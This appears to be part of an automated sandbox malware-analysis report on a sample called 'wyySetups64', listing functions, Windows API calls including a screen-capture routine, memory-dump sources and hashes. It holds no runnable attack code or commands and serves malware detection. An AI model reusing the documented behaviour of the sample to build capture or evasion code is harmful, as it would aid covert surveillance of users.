                                                                                                                                                                                                              • Instruction ID: 2a5f25cb0e7a5c773dd37b4b892846a7818c0d21703ba4f26a957d4d113c8ef8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e177de0c34a299e184ccf8c18cce01920a14cd3210eac452c8fd401d03b4f07
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2401C8B5A00709AFC760EF7AD88094AFBECAF5C650700892AE549C7610E775E5448FA0
                                                                                                                                                                                                              Function 00BD3660 Relevance: 6.0, APIs: 4, Instructions: 42timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 00BD3667
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD369C
                                                                                                                                                                                                                • Part of subcall function 00BD6E49: HeapFree.KERNEL32(00000000,00000000,?,00BD9900,00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F), ref: 00BD6E5F
                                                                                                                                                                                                                • Part of subcall function 00BD6E49: GetLastError.KERNEL32(00000000,?,00BD9900,00000000,?,00BD9FB0,00000000,00000001,00000000,?,00BDC0CF,00000018,00BE7C70,0000000C,00BDC15F,00000000), ref: 00BD6E71
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 00BD36D7
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00BD36E5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3340475617-0
                                                                                                                                                                                                              • Opcode ID: fe23c8738aecdda0c74f7913483e1047f9e528227aaf4301a4c221f7863492fb
                                                                                                                                                                                                              • Instruction ID: be59842845832f08a30eb9bb2f2ab2c2bbe945b66f97783102e7022f2f0b3f85
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fe23c8738aecdda0c74f7913483e1047f9e528227aaf4301a4c221f7863492fb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D01C8B5900B449FE3609F7AD881B97FBE8EB85314F10486EE5AE87302D635A9048F60
                                                                                                                                                                                                              Function 03373660 Relevance: 6.0, APIs: 4, Instructions: 42timeCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateWaitableTimerW.KERNEL32(00000000,00000000,00000000), ref: 03373667
                                                                                                                                                                                                              • _free.LIBCMT ref: 0337369C
                                                                                                                                                                                                                • Part of subcall function 0337F639: RtlFreeHeap.NTDLL(00000000,00000000,?,03383E4C,00000000,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76), ref: 0337F64F
                                                                                                                                                                                                                • Part of subcall function 0337F639: GetLastError.KERNEL32(00000000,?,03383E4C,00000000,?,03384500,00000000,00000001,00000000,?,03388DE6,00000018,03396448,0000000C,03388E76,00000000), ref: 0337F661
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 033736D7
                                                                                                                                                                                                              • _memset.LIBCMT ref: 033736E5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateErrorFreeHeapLastTimerWaitable_free_malloc_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3340475617-0
                                                                                                                                                                                                              • Opcode ID: b8ce50eb5aec77447df49473cd7e8ca4a5284579f7211c3c57fbf4408d14edb2
                                                                                                                                                                                                              • Instruction ID: 3e8514d88f3da56cb416f642f2df6e39c3ea67662d24457fc3fcc33f7011032f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b8ce50eb5aec77447df49473cd7e8ca4a5284579f7211c3c57fbf4408d14edb2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0101C4B5900B04DFE370DF7A98C1B97BAE9FB85214F14482EE5AE87301D635A8058F60
                                                                                                                                                                                                              Function 031FF0C6 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 031FF0E0
                                                                                                                                                                                                                • Part of subcall function 031FF032: __FF_MSGBANNER.LIBCMT ref: 031FF04B
                                                                                                                                                                                                                • Part of subcall function 031FF032: __NMSG_WRITE.LIBCMT ref: 031FF052
                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 031FF115
                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 031FF12F
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 031FF140
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2388904642-0
                                                                                                                                                                                                              • Opcode ID: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                                                                                                                                                              • Instruction ID: 99a796a49e144bb3d41e9e54757bc41baa85c5a55cd863a1d90de2e4b490878c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b08fdf8cb5e3b65abb6e8e2bd981c9ae2de8ac343fbf2f6e0fd6789c4a68690e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A4F02D794003157FDB15FB54DC24ABF7BA9DB48644F944069D6009A1D1DBF18A43CB50
                                                                                                                                                                                                              Function 00B26EEE Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 00B26F08
                                                                                                                                                                                                                • Part of subcall function 00B26E5A: __FF_MSGBANNER.LIBCMT ref: 00B26E73
                                                                                                                                                                                                                • Part of subcall function 00B26E5A: __NMSG_WRITE.LIBCMT ref: 00B26E7A
                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 00B26F3D
                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 00B26F57
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 00B26F68
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116355062.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b20000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8Throw_malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2388904642-0
                                                                                                                                                                                                              • Opcode ID: 1e9301e5085f9c58ec7a0ab4f7fc891bb570a668ba91a7db57855d99bd873ef8
                                                                                                                                                                                                              • Instruction ID: a9571a0e2c7d16b19460eb080eaeac8ca88343ca5ae13197b3ca2a44d8ef4c75
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e9301e5085f9c58ec7a0ab4f7fc891bb570a668ba91a7db57855d99bd873ef8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7DF0F431404279A6DF00EB64EC85AAD3BE5EB41304F1400A8E42C9E0D2DFB1CAC18754
                                                                                                                                                                                                              Function 00BD6490 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00BD1420: HeapFree.KERNEL32(?,00000000,?,?,?,00BD40B1,?,00000000,00BD4039,?,74DEDFA0,00BD3648), ref: 00BD143D
                                                                                                                                                                                                                • Part of subcall function 00BD1420: _free.LIBCMT ref: 00BD1459
                                                                                                                                                                                                              • HeapDestroy.KERNEL32(00000000), ref: 00BD64A3
                                                                                                                                                                                                              • HeapCreate.KERNEL32(?,?,?), ref: 00BD64B5
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD64C5
                                                                                                                                                                                                              • HeapDestroy.KERNEL32 ref: 00BD64F2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116723964.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116694335.0000000000BD0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116886071.0000000000BE5000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116935852.0000000000BE9000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4116976160.0000000000BEF000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.4117023604.0000000000BF1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_bd0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Destroy_free$CreateFree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4097506873-0
                                                                                                                                                                                                              • Opcode ID: bc2ef5737f13cc1dca07ff88fb41ad41101f48d96f24059e56ec94eb2252a633
                                                                                                                                                                                                              • Instruction ID: 1d04b57628ed8d8c306f8ce02c1279f842cfbfd84b8eb618e81a1ffc8c2aa876
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc2ef5737f13cc1dca07ff88fb41ad41101f48d96f24059e56ec94eb2252a633
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D0F037B9500B02ABE7209F25E848B13F7F8FF84714F108519E85987341EB34E851CFA0
                                                                                                                                                                                                              Function 0337CD80 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 03371420: HeapFree.KERNEL32(?,00000000,?,?,?,033740B1,?,00000000,03374039,?,74DEDFA0,03373648), ref: 0337143D
                                                                                                                                                                                                                • Part of subcall function 03371420: _free.LIBCMT ref: 03371459
                                                                                                                                                                                                              • HeapDestroy.KERNEL32(00000000), ref: 0337CD93
                                                                                                                                                                                                              • HeapCreate.KERNEL32(?,?,?), ref: 0337CDA5
                                                                                                                                                                                                              • _free.LIBCMT ref: 0337CDB5
                                                                                                                                                                                                              • HeapDestroy.KERNEL32 ref: 0337CDE2
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Destroy_free$CreateFree
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4097506873-0
                                                                                                                                                                                                              • Opcode ID: 486bdfacdb72d6492ca5413d72cfc18c2f231149ef5c10e281bb8947273a85e3
                                                                                                                                                                                                              • Instruction ID: 30179390464c8cf0b6f411f64ef20966cc31d837b8671036422129210e4c91ec
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 486bdfacdb72d6492ca5413d72cfc18c2f231149ef5c10e281bb8947273a85e3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 09F04FB9500B05EBD320DF24E888B57FBB8FF44B10F144919E859CB640D739E851CB90
                                                                                                                                                                                                              Function 031F980F Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 302COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _malloc.LIBCMT ref: 031F997F
                                                                                                                                                                                                                • Part of subcall function 031FF032: __FF_MSGBANNER.LIBCMT ref: 031FF04B
                                                                                                                                                                                                                • Part of subcall function 031FF032: __NMSG_WRITE.LIBCMT ref: 031FF052
                                                                                                                                                                                                              • _memcpy_s.LIBCMT ref: 031F9B42
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _malloc_memcpy_s
                                                                                                                                                                                                              • String ID: &
                                                                                                                                                                                                              • API String ID: 3561290194-3042966939
                                                                                                                                                                                                              • Opcode ID: c8a5b5b6493a3e00500570122ab972c2785b00225f4301cae1c49e60748ae0d9
                                                                                                                                                                                                              • Instruction ID: d588f06b8c31bb3fa14b7d4812884b0d6d7d8043eae5ce653cc29eeebf797a24
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c8a5b5b6493a3e00500570122ab972c2785b00225f4301cae1c49e60748ae0d9
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6EC15DF1A002199FDB24DF55CCC0BAAB7B8FB4C304F1485A9E709A7251D774AA85CFA4
                                                                                                                                                                                                              Function 031FC2CF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _memset_wcsrchr
                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                              • API String ID: 1675014779-2746444292
                                                                                                                                                                                                              • Opcode ID: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                                                                                                                                                              • Instruction ID: 1af3cc4063c4e8490de7cd1a3f131b2e139db85a5af26bf96a3c244f4901446b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9448fe74a29e6cb94ba3ba7ffaf0542041cc64757f3c043286b2e5ea21082185
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B3109729402187BE724D7A49C89FFF776CEB48710F140124FB0A9A1C1DB715946C7E5
                                                                                                                                                                                                              Function 0337B19D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 0337BC70: GetDesktopWindow.USER32 ref: 0337BC8F
                                                                                                                                                                                                                • Part of subcall function 0337BC70: GetDC.USER32(00000000), ref: 0337BC9C
                                                                                                                                                                                                                • Part of subcall function 0337BC70: CreateCompatibleDC.GDI32(00000000), ref: 0337BCA2
                                                                                                                                                                                                                • Part of subcall function 0337BC70: GetDC.USER32(00000000), ref: 0337BCAD
                                                                                                                                                                                                                • Part of subcall function 0337BC70: GetDeviceCaps.GDI32(00000000,00000008), ref: 0337BCBA
                                                                                                                                                                                                                • Part of subcall function 0337BC70: GetDeviceCaps.GDI32(00000000,00000076), ref: 0337BCC2
                                                                                                                                                                                                                • Part of subcall function 0337BC70: ReleaseDC.USER32(00000000,00000000), ref: 0337BCD3
                                                                                                                                                                                                                • Part of subcall function 0337BC70: GetSystemMetrics.USER32(0000004C), ref: 0337BD78
                                                                                                                                                                                                                • Part of subcall function 0337BC70: GetSystemMetrics.USER32(0000004D), ref: 0337BD8D
                                                                                                                                                                                                                • Part of subcall function 0337BC70: CreateCompatibleBitmap.GDI32(?,?,00000000), ref: 0337BDA6
                                                                                                                                                                                                                • Part of subcall function 0337BC70: SelectObject.GDI32(?,00000000), ref: 0337BDB4
                                                                                                                                                                                                                • Part of subcall function 0337BC70: SetStretchBltMode.GDI32(?,00000003), ref: 0337BDC0
                                                                                                                                                                                                                • Part of subcall function 0337BC70: GetSystemMetrics.USER32(0000004F), ref: 0337BDCD
                                                                                                                                                                                                                • Part of subcall function 0337BC70: GetSystemMetrics.USER32(0000004E), ref: 0337BDE0
                                                                                                                                                                                                                • Part of subcall function 0337F707: _malloc.LIBCMT ref: 0337F721
                                                                                                                                                                                                              • _memset.LIBCMT ref: 0337B1E1
                                                                                                                                                                                                              • swprintf.LIBCMT ref: 0337B204
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MetricsSystem$CapsCompatibleCreateDevice$BitmapDesktopModeObjectReleaseSelectStretchWindow_malloc_memsetswprintf
                                                                                                                                                                                                              • String ID: %s %s
                                                                                                                                                                                                              • API String ID: 1028806752-581060391
                                                                                                                                                                                                              • Opcode ID: 572366aca2e1a64659ee5be7b88292472d745c51d76f8a737aa906f3c0c5fd02
                                                                                                                                                                                                              • Instruction ID: db37aa0c4eeec896a6997697fcfdd0a69d035c6ee9b408b3f620359a73225638
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 572366aca2e1a64659ee5be7b88292472d745c51d76f8a737aa906f3c0c5fd02
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE21BFB6A04340ABE620EB199CC5E6FB7E8AFD9710F08056EF4895A201E6649915C7A3
                                                                                                                                                                                                              Function 03379100 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 03379115
                                                                                                                                                                                                                • Part of subcall function 0337EF39: std::exception::exception.LIBCMT ref: 0337EF4E
                                                                                                                                                                                                                • Part of subcall function 0337EF39: __CxxThrowException@8.LIBCMT ref: 0337EF63
                                                                                                                                                                                                                • Part of subcall function 0337EF39: std::exception::exception.LIBCMT ref: 0337EF74
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 03379128
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                                                              • API String ID: 963545896-2556327735
                                                                                                                                                                                                              • Opcode ID: 50ecd1f254c096c32de407652e26b4e18907cb5b0b1317762743149dac49ebdc
                                                                                                                                                                                                              • Instruction ID: ef21f47c9946d768316be3b02cfe172a4ad0e0382e7dceee0c3fd2c1fb15c3e8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 50ecd1f254c096c32de407652e26b4e18907cb5b0b1317762743149dac49ebdc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7811C47A7543408BD331CE2CEC84B1AB7E9ABE6621F150B6EE191CB741C776D815C3A4
                                                                                                                                                                                                              Function 033793F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 0337941D
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0337944A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • invalid string position, xrefs: 03379445
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                                                              • String ID: invalid string position
                                                                                                                                                                                                              • API String ID: 3614006799-1799206989
                                                                                                                                                                                                              • Opcode ID: f72ebc197061ddeddacc69adaae222fc3907c17fdbe6616fb7908f1ed4acc06d
                                                                                                                                                                                                              • Instruction ID: ec0c6cf4a6b1f96f1f127e4ef8334471d007ea154abc188bc5f7f4fc204125d4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f72ebc197061ddeddacc69adaae222fc3907c17fdbe6616fb7908f1ed4acc06d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37012637A003109BD734EE6CCCC078AF3A9AB40660F150B6DE1528FA80DB75EA81C3E1
                                                                                                                                                                                                              Function 031FF179 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __output_l.LIBCMT ref: 031FF1D4
                                                                                                                                                                                                                • Part of subcall function 031FF2DA: __getptd_noexit.LIBCMT ref: 031FF2DA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4119630030.00000000031F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 031F0000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_31f0000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd_noexit__output_l
                                                                                                                                                                                                              • String ID: B
                                                                                                                                                                                                              • API String ID: 2141734944-1255198513
                                                                                                                                                                                                              • Opcode ID: 87aa76b5352f051ca7e96a60a55cb843f290c199b1586efbdbad223d858718fb
                                                                                                                                                                                                              • Instruction ID: b1f670a7d3431727708133c7095c36d0f5971c3db562649aa82ddccada6841d4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 87aa76b5352f051ca7e96a60a55cb843f290c199b1586efbdbad223d858718fb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC016D75E042099FDF10EFA4CC01AEEBBB8EB08364F144155E924AA2C1D7B4E556CBA5
                                                                                                                                                                                                              Function 00B26FA1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __output_l.LIBCMT ref: 00B26FFC
                                                                                                                                                                                                                • Part of subcall function 00B270E4: __getptd_noexit.LIBCMT ref: 00B270E4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4116355062.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_b20000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: __getptd_noexit__output_l
                                                                                                                                                                                                              • String ID: B
                                                                                                                                                                                                              • API String ID: 2141734944-1255198513
                                                                                                                                                                                                              • Opcode ID: 9d13b0dc1e7cc3b4a828052403ade02a95932ad8b58c16c5deaaa246e36644c3
                                                                                                                                                                                                              • Instruction ID: f2fb9b3b707d4f30f36c186daf7fb3c1e152dbd603c64c0a5e36ed95971d71d8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d13b0dc1e7cc3b4a828052403ade02a95932ad8b58c16c5deaaa246e36644c3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B601C47290422D9FDF009FA4EC01BEEBBF5FB04364F004195F928A6281DB749501DBB5
                                                                                                                                                                                                              Function 03379570 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0337957F
                                                                                                                                                                                                                • Part of subcall function 0337EF86: std::exception::exception.LIBCMT ref: 0337EF9B
                                                                                                                                                                                                                • Part of subcall function 0337EF86: __CxxThrowException@8.LIBCMT ref: 0337EFB0
                                                                                                                                                                                                                • Part of subcall function 0337EF86: std::exception::exception.LIBCMT ref: 0337EFC1
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 033795B5
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • invalid string position, xrefs: 0337957A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.4120084885.00000000033A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_3370000_wyySetups64.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                                                                                                                                                              • String ID: invalid string position
                                                                                                                                                                                                              • API String ID: 1785806476-1799206989
                                                                                                                                                                                                              • Opcode ID: c4b00e17044f4d461634787a1e7d96ea25c0ab8abfc012d74a54187d9733b6ab
                                                                                                                                                                                                              • Instruction ID: ac7de1190fdd06ee197b5d3c2e4da807d11d7536ee9a273aae403b111f5674e6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c4b00e17044f4d461634787a1e7d96ea25c0ab8abfc012d74a54187d9733b6ab
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BE018F357107218FE735CA2CECD471AB7AAABC55A07280B68D081CBB49D7B9DC424794
                                                                                                                                                                                                              Function 0337D1C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 0337D1D4
                                                                                                                                                                                                                • Part of subcall function 0337EF39: std::exception::exception.LIBCMT ref: 0337EF4E
                                                                                                                                                                                                                • Part of subcall function 0337EF39: __CxxThrowException@8.LIBCMT ref: 0337EF63
                                                                                                                                                                                                                • Part of subcall function 0337EF39: std::exception::exception.LIBCMT ref: 0337EF74
                                                                                                                                                                                                              • _memmove.LIBCMT ref: 0337D20D
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.4120084885.0000000003370000.00000040.00001000.00020000.00000000.sdmp, Offset: 03370000, based on PE: true
